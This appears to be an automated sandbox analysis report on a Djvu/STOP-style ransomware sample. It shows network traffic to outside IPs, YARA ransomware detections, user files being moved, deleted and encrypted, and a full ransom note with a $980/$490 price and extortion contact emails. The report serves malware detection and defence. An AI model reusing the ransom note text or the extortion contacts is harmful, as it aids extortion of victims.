Source: U59WtZz2Sg.exe, 00000005.00000003.351612553.0000000003060000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/B equals www.youtube.com (Youtube)

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----1417805488924803Host: 88.198.94.71Content-Length: 131097Connection: Keep-AliveCache-Control: no-cache

Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49712 version: TLS 1.2

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 1_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,

1_2_004822E0

Source: U59WtZz2Sg.exe, 00000000.00000002.304665425.00000000007EA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl			Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl			Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\_readme.txt

Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-5UcwRdS3EDPrice of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@fishmail.topReserve e-mail address to contact us:datarestorehelp@airmail.ccYour personal ID:0609djfsieEK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS

Jump to dropped file

Yara detected Babuk Ransomware

Source: Yara match

File source: Process Memory Space: U59WtZz2Sg.exe PID: 6132, type: MEMORYSTR

Yara detected Djvu Ransomware

Source: Yara match	File source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.351892792.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.378615646.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: U59WtZz2Sg.exe PID: 5228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: U59WtZz2Sg.exe PID: 3692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: U59WtZz2Sg.exe PID: 1272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: U59WtZz2Sg.exe PID: 3184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: U59WtZz2Sg.exe PID: 6132, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File moved: C:\Users\user\Desktop\BPMLNOBVSB.jpg	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File deleted: C:\Users\user\Desktop\BPMLNOBVSB.jpg	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File moved: C:\Users\user\Desktop\WUTJSCBCFX\WUTJSCBCFX.docx	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File deleted: C:\Users\user\Desktop\WUTJSCBCFX\WUTJSCBCFX.docx	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File moved: C:\Users\user\Desktop\KZWFNRXYKI\QNCYCDFIJJ.mp3	Jump to behavior

Writes many files with high entropy

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 entropy: 7.99718399296	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 entropy: 7.99869096623	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001 entropy: 7.99861836034	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133051620838562510.txt entropy: 7.99842047333	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\plugins.qmltypes entropy: 7.9976440774	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133051620921860467.txt entropy: 7.9983292679	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133142701119838854.txt entropy: 7.99818298483	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133142701138403912.txt entropy: 7.99822942189	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133142701505080737.txt entropy: 7.99843483481	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\images\flapper.gif entropy: 7.99709477717	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Extras\plugins.qmltypes entropy: 7.99393413696	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Templates.2\plugins.qmltypes entropy: 7.99754052711	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt entropy: 7.99584745995	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt entropy: 7.99855840227	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt entropy: 7.99463027142	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt entropy: 7.99489474793	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99188039174	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt entropy: 7.99835419598	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt entropy: 7.99865927987	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt entropy: 7.996764672	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt entropy: 7.99817114966	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt entropy: 7.99155169116	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt entropy: 7.99862793305	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt entropy: 7.99564862987	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt entropy: 7.99365886765	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\{5BAAF43C-032B-11EB-90E4-ECF4BB570DC9}.dat entropy: 7.9912230943	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt entropy: 7.99662861073	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui entropy: 7.99409784357	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt entropy: 7.99636084684	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt entropy: 7.99443921081	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt entropy: 7.99121582669	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\eventpage_bin_prod.js entropy: 7.99751740013	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\WimProvider.dll.mui entropy: 7.9923616287	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\de\OneDrive.adml entropy: 7.99556620242	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\es\OneDrive.adml entropy: 7.99597410146	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\fr\OneDrive.adml entropy: 7.99599838665	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\hu\OneDrive.adml entropy: 7.99603839271	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\it\OneDrive.adml entropy: 7.99575239825	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\ja\OneDrive.adml entropy: 7.99595138657	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\ko\OneDrive.adml entropy: 7.99574027367	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\nl\OneDrive.adml entropy: 7.9952345599	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg entropy: 7.99746001356	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\pl\OneDrive.adml entropy: 7.99597646639	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\pt-BR\OneDrive.adml entropy: 7.99602810998	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\pt-PT\OneDrive.adml entropy: 7.9950605594	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\ru\OneDrive.adml entropy: 7.99692983487	Jump to dropped file
